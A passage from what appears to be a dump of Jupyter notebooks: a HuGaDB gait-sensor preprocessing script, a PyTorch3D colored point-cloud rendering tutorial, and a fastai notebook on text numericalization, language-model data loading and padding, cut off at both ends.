nding_10_00.txt\nHuGaDB_v1_standing_10_01.txt\nHuGaDB_v1_standing_10_02.txt\nHuGaDB_v1_standing_10_03.txt\nHuGaDB_v1_standing_11_00.txt\nHuGaDB_v1_standing_11_01.txt\nHuGaDB_v1_standing_11_02.txt\nHuGaDB_v1_standing_11_03.txt\nHuGaDB_v1_standing_11_04.txt\nHuGaDB_v1_standing_12_00.txt\nHuGaDB_v1_standing_12_01.txt\nHuGaDB_v1_standing_12_02.txt\nHuGaDB_v1_standing_12_03.txt\nHuGaDB_v1_standing_12_04.txt\nHuGaDB_v1_standing_13_00.txt\nHuGaDB_v1_standing_13_01.txt\nHuGaDB_v1_standing_13_02.txt\nHuGaDB_v1_standing_13_03.txt\nHuGaDB_v1_standing_15_00.txt\nHuGaDB_v1_standing_15_01.txt\nHuGaDB_v1_standing_15_02.txt\nHuGaDB_v1_standing_15_03.txt\nHuGaDB_v1_standing_15_04.txt\nHuGaDB_v1_standing_16_00.txt\nHuGaDB_v1_standing_16_01.txt\nHuGaDB_v1_standing_16_02.txt\nHuGaDB_v1_standing_16_03.txt\nHuGaDB_v1_standing_16_04.txt\nHuGaDB_v1_standing_17_00.txt\nHuGaDB_v1_standing_17_01.txt\nHuGaDB_v1_standing_17_02.txt\nHuGaDB_v1_standing_17_03.txt\nHuGaDB_v1_standing_18_00.txt\nHuGaDB_v1_standing_18_01.txt\nHuGaDB_v1_standing_18_02.txt\nHuGaDB_v1_standing_18_03.txt\nHuGaDB_v1_standing_18_04.txt\nHuGaDB_v1_various_01_00.txt\nHuGaDB_v1_various_01_01.txt\nHuGaDB_v1_various_01_02.txt\nHuGaDB_v1_various_01_03.txt\nHuGaDB_v1_various_01_04.txt\nHuGaDB_v1_various_01_05.txt\nHuGaDB_v1_various_01_06.txt\nHuGaDB_v1_various_01_07.txt\nHuGaDB_v1_various_01_08.txt\nHuGaDB_v1_various_01_09.txt\nHuGaDB_v1_various_01_10.txt\nHuGaDB_v1_various_01_11.txt\nHuGaDB_v1_various_01_12.txt\nHuGaDB_v1_various_01_13.txt\nHuGaDB_v1_various_01_14.txt\nHuGaDB_v1_various_01_15.txt\nHuGaDB_v1_various_01_16.txt\nHuGaDB_v1_various_02_00.txt\nHuGaDB_v1_various_02_01.txt\nHuGaDB_v1_various_02_02.txt\nHuGaDB_v1_various_02_03.txt\nHuGaDB_v1_various_02_04.txt\nHuGaDB_v1_various_02_05.txt\nHuGaDB_v1_various_02_06.txt\nHuGaDB_v1_various_03_00.txt\nHuGaDB_v1_various_03_01.txt\nHuGaDB_v1_various_03_02.txt\nHuGaDB_v1_various_03_03.txt\nHuGaDB_v1_various_03_04.txt\nHuGaDB_v1_various_03_05.txt\nHuGaDB_v1_various_03_06.txt\nHuGaDB_v1_various_03_07.txt\nHuGaDB_v1_various_03_08.txt\nHuGaDB_v1_various_03_09.txt\nHuGaDB_v1_various_03_10.txt\nHuGaDB_v1_various_03_11.txt\nHuGaDB_v1_various_03_12.txt\nHuGaDB_v1_various_03_13.txt\nHuGaDB_v1_various_03_14.txt\nHuGaDB_v1_various_03_15.txt\nHuGaDB_v1_various_03_16.txt\nHuGaDB_v1_various_03_17.txt\nHuGaDB_v1_various_03_18.txt\nHuGaDB_v1_various_03_19.txt\nHuGaDB_v1_various_03_20.txt\nHuGaDB_v1_various_03_21.txt\nHuGaDB_v1_various_03_22.txt\nHuGaDB_v1_various_03_23.txt\nHuGaDB_v1_various_03_24.txt\nHuGaDB_v1_various_04_00.txt\nHuGaDB_v1_various_04_01.txt\nHuGaDB_v1_various_04_02.txt\nHuGaDB_v1_various_04_03.txt\nHuGaDB_v1_various_04_0
4.txt\nHuGaDB_v1_various_04_05.txt\nHuGaDB_v1_various_04_06.txt\nHuGaDB_v1_various_04_07.txt\nHuGaDB_v1_various_04_08.txt\nHuGaDB_v1_various_04_09.txt\nHuGaDB_v1_various_04_10.txt\nHuGaDB_v1_various_04_11.txt\nHuGaDB_v1_various_04_12.txt\nHuGaDB_v1_various_04_13.txt\nHuGaDB_v1_various_04_14.txt\nHuGaDB_v1_various_04_15.txt\nHuGaDB_v1_various_04_16.txt\nHuGaDB_v1_various_04_17.txt\nHuGaDB_v1_various_04_18.txt\nHuGaDB_v1_various_04_19.txt\nHuGaDB_v1_various_05_00.txt\nHuGaDB_v1_various_05_01.txt\nHuGaDB_v1_various_05_02.txt\nHuGaDB_v1_various_05_03.txt\nHuGaDB_v1_various_05_04.txt\nHuGaDB_v1_various_05_05.txt\nHuGaDB_v1_various_05_06.txt\nHuGaDB_v1_various_05_07.txt\nHuGaDB_v1_various_05_08.txt\nHuGaDB_v1_various_05_09.txt\nHuGaDB_v1_various_05_10.txt\nHuGaDB_v1_various_05_11.txt\nHuGaDB_v1_various_05_12.txt\nHuGaDB_v1_various_05_13.txt\nHuGaDB_v1_various_05_14.txt\nHuGaDB_v1_various_05_15.txt\nHuGaDB_v1_various_05_16.txt\nHuGaDB_v1_various_05_17.txt\nHuGaDB_v1_various_05_18.txt\nHuGaDB_v1_various_05_19.txt\nHuGaDB_v1_various_05_20.txt\nHuGaDB_v1_various_06_00.txt\nHuGaDB_v1_various_06_01.txt\nHuGaDB_v1_various_06_02.txt\nHuGaDB_v1_various_06_03.txt\nHuGaDB_v1_various_06_04.txt\nHuGaDB_v1_various_06_05.txt\nHuGaDB_v1_various_06_06.txt\nHuGaDB_v1_various_06_07.txt\nHuGaDB_v1_various_06_08.txt\nHuGaDB_v1_various_06_09.txt\nHuGaDB_v1_various_06_10.txt\n"
],
[
"trainers = [5,12,9]\ntesters = list(range(1, 18+1))\n[testers.remove(a) for a in trainers]\n\nfile_list = ['HuGaDB_v1_walking_06_04.txt']\n#file_list = os.listdir()\nfile_list = list(filter(lambda x: x.split('.')[-1] == 'txt', file_list))\nACCEL_FIX = 9.80665*2.0/32768 # m/s^2\nGYRO_FIX = 2000/32768 # deg/sec\n\nSENS = ['acc', 'gyro']\n#LOCS = ['rf','rs','rt','lf','ls','lt']\nLOCS = ['rf']\nACTS = ['bicycling','running','sitting','standing','walking']\nDIMS = ['x','y','z']\n\nprocessed_dir = 'processed'\nactivity_dir = os.path.join(processed_dir, 'activity')\nsegment_dir = os.path.join(processed_dir, 'segment')\nsubject_dir = os.path.join(processed_dir, 'subject')\ntraining_dir = os.path.join(processed_dir, 'training')\n\ntry:\n shutil.rmtree(processed_dir)\nexcept FileNotFoundError:\n pass\nos.mkdir(processed_dir)\nos.mkdir(activity_dir)\n[os.mkdir(os.path.join(activity_dir, a)) for a in ACTS]\nos.mkdir(segment_dir)\n[os.mkdir(os.path.join(segment_dir, a)) for a in LOCS]\nos.mkdir(subject_dir)\n[os.mkdir(os.path.join(subject_dir, str(a))) for a in testers]\nos.mkdir(training_dir)\n\ndata = pd.read_csv(file_list[0],sep='\\t')\n\nfor data_file in file_list:\n print(data_file)\n subject = int(data_file.split('_')[-2])\n activity = data_file.split('_')[2]\n for loc in LOCS:\n sensor_data = []\n for sen in SENS:\n for dim in DIMS:\n one_d = data['{}_{}_{}'.format(sen, loc, dim)].values\n if sen=='acc':\n sensor_data.append(one_d*ACCEL_FIX)\n if sen=='gyro':\n sensor_data.append(one_d*GYRO_FIX)\n \n if subject in trainers:\n append_to_binary(os.path.join(training_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n else:\n # all test\n append_to_binary(os.path.join(processed_dir, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # activity\n if activity in ACTS:\n append_to_binary(os.path.join(activity_dir, activity, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # segment\n append_to_binary(os.path.join(segment_dir, loc, \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n # subject\n append_to_binary(os.path.join(subject_dir, str(subject), \"{}_{}\".format(sen, dim)), one_d.astype(np.int16))\n \n if subject in trainers:\n append_batch_to_csv(os.path.join(training_dir,'all.csv'), zip(*sensor_data))\n else:\n append_batch_to_csv(os.path.join(processed_dir, 'all.csv'), zip(*sensor_data))\n if activity in ACTS:\n append_batch_to_csv(os.path.join(activity_dir, activity, 'all.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(segment_dir, loc, 'all.csv'), zip(*sensor_data))\n append_batch_to_csv(os.path.join(subject_dir, str(subject), 'all.csv'), zip(*sensor_data))\n\n \n\n\n",
"HuGaDB_v1_walking_06_04.txt\n"
],
[
"file_list[0]",
"_____no_output_____"
],
[
"data = pd.read_csv(file_list[0], sep='\\t')",
"_____no_output_____"
],
[
"data['gyro_rf_z'].values",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70792aed6597c82f68063b7e7dcbd0d58b88427 | 243,773 | ipynb | Jupyter Notebook | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | docs/tutorials/render_colored_points.ipynb | ladzin/pytorch3d | b2b0c5a4426bb907517452a6fe643eda39dd73c8 | [
"BSD-3-Clause"
] | null | null | null | 732.051051 | 123,524 | 0.952575 | [
[
[
"# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.",
"_____no_output_____"
]
],
[
[
"# Render a colored point cloud\n\nThis tutorial shows how to:\n- set up a renderer \n- render the point cloud \n- vary the rendering settings such as compositing and camera position",
"_____no_output_____"
],
[
"## Import modules",
"_____no_output_____"
],
[
"If `torch`, `torchvision` and `pytorch3d` are not installed, run the following cell:",
"_____no_output_____"
]
],
[
[
"!pip install torch torchvision\n!pip install 'git+https://github.com/facebookresearch/pytorch3d.git'",
"_____no_output_____"
],
[
"import os\nos.chdir('../..')\nimport torch\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n# Util function for loading point clouds\nimport numpy as np\n\n# Data structures and functions for rendering\nfrom pytorch3d.structures import Pointclouds\nfrom pytorch3d.renderer import (\n look_at_view_transform,\n OpenGLOrthographicCameras, \n PointsRasterizationSettings,\n PointsRenderer,\n PointsRasterizer,\n AlphaCompositor,\n NormWeightedCompositor\n)",
"_____no_output_____"
]
],
[
[
"### Load a point cloud and corresponding colors\n\nLoad a `.ply` file and create a **Point Cloud** object. \n\n**Pointclouds** is a unique datastructure provided in PyTorch3D for working with batches of point clouds of different sizes. ",
"_____no_output_____"
],
[
"If running this notebook using **Google Colab**, run the following cell to fetch the pointcloud data and save it at the path `data/PittsburghBridge`:\nIf running locally, the data is already available at the correct path. ",
"_____no_output_____"
]
],
[
[
"!mkdir -p data/PittsburghBridge\n!wget -P data/PittsburghBridge https://dl.fbaipublicfiles.com/pytorch3d/data/PittsburghBridge/pointcloud.npz",
"_____no_output_____"
],
[
"# Setup\ndevice = torch.device(\"cuda:0\")\ntorch.cuda.set_device(device)\n\n# Set paths\nDATA_DIR = \"./data\"\nobj_filename = os.path.join(DATA_DIR, \"PittsburghBridge/pointcloud.npz\")\n\n# Load point cloud\npointcloud = np.load(obj_filename)\nverts = torch.Tensor(pointcloud['verts']).to(device)\nrgb = torch.Tensor(pointcloud['rgb']).to(device)\n\npoint_cloud = Pointclouds(points=[verts], features=[rgb])",
"_____no_output_____"
]
],
[
[
"## Create a renderer\n\nA renderer in PyTorch3D is composed of a **rasterizer** and a **shader** which each have a number of subcomponents such as a **camera** (orthgraphic/perspective). Here we initialize some of these components and use default values for the rest.\n\nIn this example we will first create a **renderer** which uses an **orthographic camera**, and applies **alpha compositing**. Then we learn how to vary different components using the modular API. \n\n[1] <a href=\"https://arxiv.org/abs/1912.08804\">SynSin: End to end View Synthesis from a Single Image.</a> Olivia Wiles, Georgia Gkioxari, Richard Szeliski, Justin Johnson. CVPR 2020.",
"_____no_output_____"
]
],
[
[
"# Initialize an OpenGL perspective camera.\nR, T = look_at_view_transform(20, 10, 0)\ncameras = OpenGLOrthographicCameras(device=device, R=R, T=T, znear=0.01)\n\n# Define the settings for rasterization and shading. Here we set the output image to be of size\n# 512x512. As we are rendering images for visualization purposes only we will set faces_per_pixel=1\n# and blur_radius=0.0. Refer to raster_points.py for explanations of these parameters. \nraster_settings = PointsRasterizationSettings(\n image_size=512, \n radius = 0.003,\n points_per_pixel = 10\n)\n\n\n# Create a points renderer by compositing points using an alpha compositor (nearer points\n# are weighted more heavily). See [1] for an explanation.\nrenderer = PointsRenderer(\n rasterizer=PointsRasterizer(\n cameras=cameras, \n raster_settings=raster_settings\n ),\n compositor=AlphaCompositor(\n device=device, \n composite_params=None\n )\n)\n",
"_____no_output_____"
],
[
"images = renderer(point_cloud)\nplt.figure(figsize=(10, 10))\nplt.imshow(images[0, ..., :3].cpu().numpy())\nplt.grid(\"off\")\nplt.axis(\"off\")",
"_____no_output_____"
]
],
[
[
"In this example we will first create a **renderer** which uses an **orthographic camera**, and applies **weighted compositing**. ",
"_____no_output_____"
]
],
[
[
"# Initialize an OpenGL perspective camera.\nR, T = look_at_view_transform(20, 10, 0)\ncameras = OpenGLOrthographicCameras(device=device, R=R, T=T, znear=0.01)\n\n# Define the settings for rasterization and shading. Here we set the output image to be of size\n# 512x512. As we are rendering images for visualization purposes only we will set faces_per_pixel=1\n# and blur_radius=0.0. Refer to rasterize_points.py for explanations of these parameters. \nraster_settings = PointsRasterizationSettings(\n image_size=512, \n radius = 0.003,\n points_per_pixel = 10\n)\n\n\n# Create a points renderer by compositing points using an weighted compositor (3D points are\n# weighted according to their distance to a pixel and accumulated using a weighted sum)\nrenderer = PointsRenderer(\n rasterizer=PointsRasterizer(\n cameras=cameras, \n raster_settings=raster_settings\n ),\n compositor=NormWeightedCompositor(\n device=device, \n composite_params=None\n )\n)\n",
"_____no_output_____"
],
[
"images = renderer(point_cloud)\nplt.figure(figsize=(10, 10))\nplt.imshow(images[0, ..., :3].cpu().numpy())\nplt.grid(\"off\")\nplt.axis(\"off\")",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707976eeef89a871b2f4cd2694e98a92ed8dd04 | 77,620 | ipynb | Jupyter Notebook | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | nbs/31_text.data.ipynb | nightlifelover/fastai | 29be53d7ccaf7405320e2e47db8f35182abeff0a | [
"Apache-2.0"
] | null | null | null | 44.077229 | 1,049 | 0.578755 | [
[
[
"#hide\n#skip\n! [ -e /content ] && pip install -Uqq fastai # upgrade fastai on colab",
"_____no_output_____"
],
[
"#export\nfrom fastai.torch_basics import *\nfrom fastai.data.all import *\nfrom fastai.text.core import *",
"_____no_output_____"
],
[
"#hide\nfrom nbdev.showdoc import *",
"_____no_output_____"
],
[
"#default_exp text.data\n#default_cls_lvl 3",
"_____no_output_____"
]
],
[
[
"# Text data\n\n> Functions and transforms to help gather text data in a `Datasets`",
"_____no_output_____"
],
[
"## Backwards\n\nReversing the text can provide higher accuracy with an ensemble with a forward model. All that is needed is a `type_tfm` that will reverse the text as it is brought in:",
"_____no_output_____"
]
],
[
[
"#export\ndef reverse_text(x): return x.flip(0)",
"_____no_output_____"
],
[
"t = tensor([0,1,2])\nr = reverse_text(t)\ntest_eq(r, tensor([2,1,0]))",
"_____no_output_____"
]
],
[
[
"## Numericalizing",
"_____no_output_____"
],
[
"Numericalization is the step in which we convert tokens to integers. The first step is to build a correspondence token to index that is called a vocab.",
"_____no_output_____"
]
],
[
[
"#export\ndef make_vocab(count, min_freq=3, max_vocab=60000, special_toks=None):\n \"Create a vocab of `max_vocab` size from `Counter` `count` with items present more than `min_freq`\"\n vocab = [o for o,c in count.most_common(max_vocab) if c >= min_freq]\n special_toks = ifnone(special_toks, defaults.text_spec_tok)\n for o in reversed(special_toks): #Make sure all special tokens are in the vocab\n if o in vocab: vocab.remove(o)\n vocab.insert(0, o)\n vocab = vocab[:max_vocab]\n return vocab + [f'xxfake' for i in range(0, 8-len(vocab)%8)]",
"_____no_output_____"
]
],
[
[
"If there are more than `max_vocab` tokens, the ones kept are the most frequent.\n\n> Note: For performance when using mixed precision, the vocabulary is always made of size a multiple of 8, potentially by adding `xxfake` tokens.",
"_____no_output_____"
]
],
[
[
"count = Counter(['a', 'a', 'a', 'a', 'b', 'b', 'c', 'c', 'd'])\ntest_eq(set([x for x in make_vocab(count) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a'.split()))\ntest_eq(len(make_vocab(count))%8, 0)\ntest_eq(set([x for x in make_vocab(count, min_freq=1) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a b c d'.split()))\ntest_eq(set([x for x in make_vocab(count,max_vocab=12, min_freq=1) if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'a b c'.split()))",
"_____no_output_____"
],
[
"#export\nclass TensorText(TensorBase): pass\nclass LMTensorText(TensorText): pass\n\nTensorText.__doc__ = \"Semantic type for a tensor representing text\"\nLMTensorText.__doc__ = \"Semantic type for a tensor representing text in language modeling\"",
"_____no_output_____"
],
[
"#export\nclass Numericalize(Transform):\n \"Reversible transform of tokenized texts to numericalized ids\"\n def __init__(self, vocab=None, min_freq=3, max_vocab=60000, special_toks=None):\n store_attr('vocab,min_freq,max_vocab,special_toks')\n self.o2i = None if vocab is None else defaultdict(int, {v:k for k,v in enumerate(vocab)})\n\n def setups(self, dsets):\n if dsets is None: return\n if self.vocab is None:\n count = dsets.counter if getattr(dsets, 'counter', None) is not None else Counter(p for o in dsets for p in o)\n if self.special_toks is None and hasattr(dsets, 'special_toks'):\n self.special_toks = dsets.special_toks\n self.vocab = make_vocab(count, min_freq=self.min_freq, max_vocab=self.max_vocab, special_toks=self.special_toks)\n self.o2i = defaultdict(int, {v:k for k,v in enumerate(self.vocab) if v != 'xxfake'})\n\n def encodes(self, o): return TensorText(tensor([self.o2i [o_] for o_ in o]))\n def decodes(self, o): return L(self.vocab[o_] for o_ in o)",
"_____no_output_____"
],
[
"num = Numericalize(min_freq=2)\nnum.setup(L('This is an example of text'.split(), 'this is another text'.split()))",
"_____no_output_____"
],
[
"start = 'This is an example of text '",
"_____no_output_____"
]
],
[
[
"If no `vocab` is passed, one is created at setup from the data, using `make_vocab` with `min_freq` and `max_vocab`.",
"_____no_output_____"
]
],
[
[
"start = 'This is an example of text'\nnum = Numericalize(min_freq=1)\nnum.setup(L(start.split(), 'this is another text'.split()))\ntest_eq(set([x for x in num.vocab if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'This is an example of text this another'.split()))\ntest_eq(len(num.vocab)%8, 0)\nt = num(start.split())\n\ntest_eq(t, tensor([11, 9, 12, 13, 14, 10]))\ntest_eq(num.decode(t), start.split())",
"_____no_output_____"
],
[
"num = Numericalize(min_freq=2)\nnum.setup(L('This is an example of text'.split(), 'this is another text'.split()))\ntest_eq(set([x for x in num.vocab if not x.startswith('xxfake')]), \n set(defaults.text_spec_tok + 'is text'.split()))\ntest_eq(len(num.vocab)%8, 0)\nt = num(start.split())\ntest_eq(t, tensor([0, 9, 0, 0, 0, 10]))\ntest_eq(num.decode(t), f'{UNK} is {UNK} {UNK} {UNK} text'.split())",
"_____no_output_____"
],
[
"#hide\ndf = pd.DataFrame({'texts': ['This is an example of text', 'this is another text']})\ntl = TfmdLists(df, [attrgetter('text'), Tokenizer.from_df('texts'), Numericalize(min_freq=2)])\ntest_eq(tl, [tensor([2, 8, 9, 10, 0, 0, 0, 11]), tensor([2, 9, 10, 0, 11])])",
"_____no_output_____"
]
],
[
[
"## LM_DataLoader -",
"_____no_output_____"
]
],
[
[
"#export\ndef _maybe_first(o): return o[0] if isinstance(o, tuple) else o",
"_____no_output_____"
],
[
"#export\ndef _get_tokenizer(ds):\n tok = getattr(ds, 'tokenizer', None)\n if isinstance(tok, Tokenizer): return tok\n if isinstance(tok, (list,L)):\n for t in tok:\n if isinstance(t, Tokenizer): return t",
"_____no_output_____"
],
[
"#export\ndef _get_lengths(ds):\n tok = _get_tokenizer(ds)\n if tok is None: return\n return tok.get_lengths(ds.items)",
"_____no_output_____"
],
[
"#export\n#TODO: add backward\n@delegates()\nclass LMDataLoader(TfmdDL):\n \"A `DataLoader` suitable for language modeling\"\n def __init__(self, dataset, lens=None, cache=2, bs=64, seq_len=72, num_workers=0, **kwargs):\n self.items = ReindexCollection(dataset, cache=cache, tfm=_maybe_first)\n self.seq_len = seq_len\n if lens is None: lens = _get_lengths(dataset)\n if lens is None: lens = [len(o) for o in self.items]\n self.lens = ReindexCollection(lens, idxs=self.items.idxs)\n # The \"-1\" is to allow for final label, we throw away the end that's less than bs\n corpus = round_multiple(sum(lens)-1, bs, round_down=True)\n self.bl = corpus//bs #bl stands for batch length\n self.n_batches = self.bl//(seq_len) + int(self.bl%seq_len!=0)\n self.last_len = self.bl - (self.n_batches-1)*seq_len\n self.make_chunks()\n super().__init__(dataset=dataset, bs=bs, num_workers=num_workers, **kwargs)\n self.n = self.n_batches*bs\n\n def make_chunks(self): self.chunks = Chunks(self.items, self.lens)\n def shuffle_fn(self,idxs):\n self.items.shuffle()\n self.make_chunks()\n return idxs\n\n def create_item(self, seq):\n if seq>=self.n: raise IndexError\n sl = self.last_len if seq//self.bs==self.n_batches-1 else self.seq_len\n st = (seq%self.bs)*self.bl + (seq//self.bs)*self.seq_len\n txt = self.chunks[st : st+sl+1]\n return LMTensorText(txt[:-1]),txt[1:]\n\n @delegates(TfmdDL.new)\n def new(self, dataset=None, seq_len=None, **kwargs):\n lens = self.lens.coll if dataset is None else None\n seq_len = self.seq_len if seq_len is None else seq_len\n return super().new(dataset=dataset, lens=lens, seq_len=seq_len, **kwargs)",
"_____no_output_____"
],
[
"show_doc(LMDataLoader, title_level=2)",
"_____no_output_____"
]
],
[
[
"`dataset` should be a collection of numericalized texts for this to work. `lens` can be passed for optimizing the creation, otherwise, the `LMDataLoader` will do a full pass of the `dataset` to compute them. `cache` is used to avoid reloading items unnecessarily.\n\nThe `LMDataLoader` will concatenate all texts (maybe `shuffle`d) in one big stream, split it in `bs` contiguous sentences, then go through those `seq_len` at a time.",
"_____no_output_____"
]
],
[
[
"#hide\nbs,sl = 4,3\nints = L([0,1,2,3,4],[5,6,7,8,9,10],[11,12,13,14,15,16,17,18],[19,20],[21,22]).map(tensor)\ndl = LMDataLoader(ints, bs=bs, seq_len=sl)\nlist(dl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [5, 6, 7], [10, 11, 12], [15, 16, 17]]),\n tensor([[1, 2, 3], [6, 7, 8], [11, 12, 13], [16, 17, 18]])],\n [tensor([[3, 4], [8, 9], [13, 14], [18, 19]]),\n tensor([[4, 5], [9, 10], [14, 15], [19, 20]])]])",
"_____no_output_____"
],
[
"bs,sl = 4,3\nints = L([0,1,2,3,4],[5,6,7,8,9,10],[11,12,13,14,15,16,17,18],[19,20],[21,22,23],[24]).map(tensor)",
"_____no_output_____"
],
[
"dl = LMDataLoader(ints, bs=bs, seq_len=sl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]]),\n tensor([[1, 2, 3], [7, 8, 9], [13, 14, 15], [19, 20, 21]])],\n [tensor([[3, 4, 5], [ 9, 10, 11], [15, 16, 17], [21, 22, 23]]),\n tensor([[4, 5, 6], [10, 11, 12], [16, 17, 18], [22, 23, 24]])]])",
"_____no_output_____"
],
[
"#hide\n#Check lens work\ndl = LMDataLoader(ints, lens=ints.map(len), bs=bs, seq_len=sl)\ntest_eq(list(dl),\n [[tensor([[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]]),\n tensor([[1, 2, 3], [7, 8, 9], [13, 14, 15], [19, 20, 21]])],\n [tensor([[3, 4, 5], [ 9, 10, 11], [15, 16, 17], [21, 22, 23]]),\n tensor([[4, 5, 6], [10, 11, 12], [16, 17, 18], [22, 23, 24]])]])",
"_____no_output_____"
],
[
"dl = LMDataLoader(ints, bs=bs, seq_len=sl, shuffle=True)\nfor x,y in dl: test_eq(x[:,1:], y[:,:-1])\n((x0,y0), (x1,y1)) = tuple(dl)\n#Second batch begins where first batch ended\ntest_eq(y0[:,-1], x1[:,0]) \ntest_eq(type(x0), LMTensorText)",
"_____no_output_____"
],
[
"#hide\n#test new works\ndl = LMDataLoader(ints, bs=bs, seq_len=sl, shuffle=True)\ndl1 = dl.new()\ntest_eq(dl1.seq_len, sl)\ndl2 = dl.new(seq_len=2)\ntest_eq(dl2.seq_len, 2)",
"_____no_output_____"
]
],
[
[
"### Showing -",
"_____no_output_____"
]
],
[
[
"#export\n@typedispatch\ndef show_batch(x: TensorText, y, samples, ctxs=None, max_n=10, trunc_at=150, **kwargs):\n if ctxs is None: ctxs = get_empty_df(min(len(samples), max_n))\n if trunc_at is not None: samples = L((s[0].truncate(trunc_at),*s[1:]) for s in samples)\n ctxs = show_batch[object](x, y, samples, max_n=max_n, ctxs=ctxs, **kwargs)\n display_df(pd.DataFrame(ctxs))\n return ctxs",
"_____no_output_____"
],
[
"#export\n@typedispatch\ndef show_batch(x: LMTensorText, y, samples, ctxs=None, max_n=10, trunc_at=150, **kwargs):\n samples = L((s[0].truncate(trunc_at), s[1].truncate(trunc_at)) for s in samples)\n return show_batch[TensorText](x, None, samples, ctxs=ctxs, max_n=max_n, trunc_at=None, **kwargs)",
"_____no_output_____"
]
],
[
[
"## Classification",
"_____no_output_____"
],
[
"For classification, we deal with the fact that texts don't all have the same length by using padding.",
"_____no_output_____"
]
],
[
[
"# export\nclass Pad_Input(ItemTransform):\n def encodes(self,samples, pad_idx=1, pad_fields=0, pad_first=False, backwards=False):\n \"Function that collect `samples` and adds padding\"\n self.pad_idx = pad_idx\n pad_fields = L(pad_fields)\n max_len_l = pad_fields.map(lambda f: max([len(s[f]) for s in samples]))\n if backwards: pad_first = not pad_first\n def _f(field_idx, x):\n if field_idx not in pad_fields: return x\n idx = pad_fields.items.index(field_idx) #TODO: remove items if L.index is fixed\n sl = slice(-len(x), sys.maxsize) if pad_first else slice(0, len(x))\n pad = x.new_zeros(max_len_l[idx]-x.shape[0])+pad_idx\n x1 = torch.cat([pad, x] if pad_first else [x, pad])\n if backwards: x1 = x1.flip(0)\n return retain_type(x1, x)\n return [tuple(map(lambda idxx: _f(*idxx), enumerate(s))) for s in samples]\n def decodes(self, o:TensorText):\n pad_idx = self.pad_idx if hasattr(self,'pad_idx') else 1\n return o[o != pad_idx]\npad_input=Pad_Input()",
"_____no_output_____"
]
],
[
[
"`pad_idx` is used for the padding, and the padding is applied to the `pad_fields` of the samples. The padding is applied at the beginning if `pad_first` is `True`, and if `backwards` is added, the tensors are flipped.",
"_____no_output_____"
]
],
[
[
"test_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0), \n [(tensor([1,2,3]),1), (tensor([4,5,0]),2), (tensor([6,0,0]), 3)])\ntest_eq(pad_input([(tensor([1,2,3]), (tensor([6]))), (tensor([4,5]), tensor([4,5])), (tensor([6]), (tensor([1,2,3])))], pad_idx=0, pad_fields=1), \n [(tensor([1,2,3]),(tensor([6,0,0]))), (tensor([4,5]),tensor([4,5,0])), ((tensor([6]),tensor([1, 2, 3])))])\ntest_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0, pad_first=True), \n [(tensor([1,2,3]),1), (tensor([0,4,5]),2), (tensor([0,0,6]), 3)])\ntest_eq(pad_input([(tensor([1,2,3]),1), (tensor([4,5]), 2), (tensor([6]), 3)], pad_idx=0, backwards=True), \n [(tensor([3,2,1]),1), (tensor([5,4,0]),2), (tensor([6,0,0]), 3)])\nx = pad_input([(TensorText([1,2,3]),1), (TensorText([4,5]), 2), (TensorText([6]), 3)], pad_idx=0)\ntest_eq(x, [(tensor([1,2,3]),1), (tensor([4,5,0]), 2), (tensor([6,0,0]), 3)])\ntest_eq(pad_input.decode(x[1][0]), tensor([4,5]))",
"_____no_output_____"
],
[
"#hide\n#Check retain type\nx = [(TensorText([1,2,3]),1), (TensorText([4,5]), 2), (TensorText([6]), 3)]\ny = pad_input(x, pad_idx=0)\nfor s in y: test_eq(type(s[0]), TensorText)",
"_____no_output_____"
]
],
[
[
"Pads `x` with `pad_idx` to length `pad_len`. If `pad_first` is false, all padding is appended to `x`, until `x` is len `pad_len`. Otherwise ff `pad_first` is true, then chunks of size `seq_len` are prepended to `x`, the remainder of the padding is appended to `x`. ",
"_____no_output_____"
]
],
[
[
"#export\ndef pad_chunk(x,pad_idx=1, pad_first=True, seq_len=72, pad_len=10):\n \"Pad `x` by adding padding by chunks of size `seq_len`\"\n l = pad_len - x.shape[0]\n pad_chunk = x.new_zeros((l//seq_len) * seq_len) + pad_idx\n pad_res = x.new_zeros(l % seq_len) + pad_idx\n x1 = torch.cat([pad_chunk, x, pad_res]) if pad_first else torch.cat([x, pad_chunk, pad_res])\n return retain_type(x1, x)",
"_____no_output_____"
],
[
"print('pad_first: ',pad_chunk(torch.tensor([1,2,3]),seq_len=3,pad_idx=0,pad_len=8))\nprint('pad_last: ',pad_chunk(torch.tensor([1,2,3]),seq_len=3,pad_idx=0,pad_len=8,pad_first=False))",
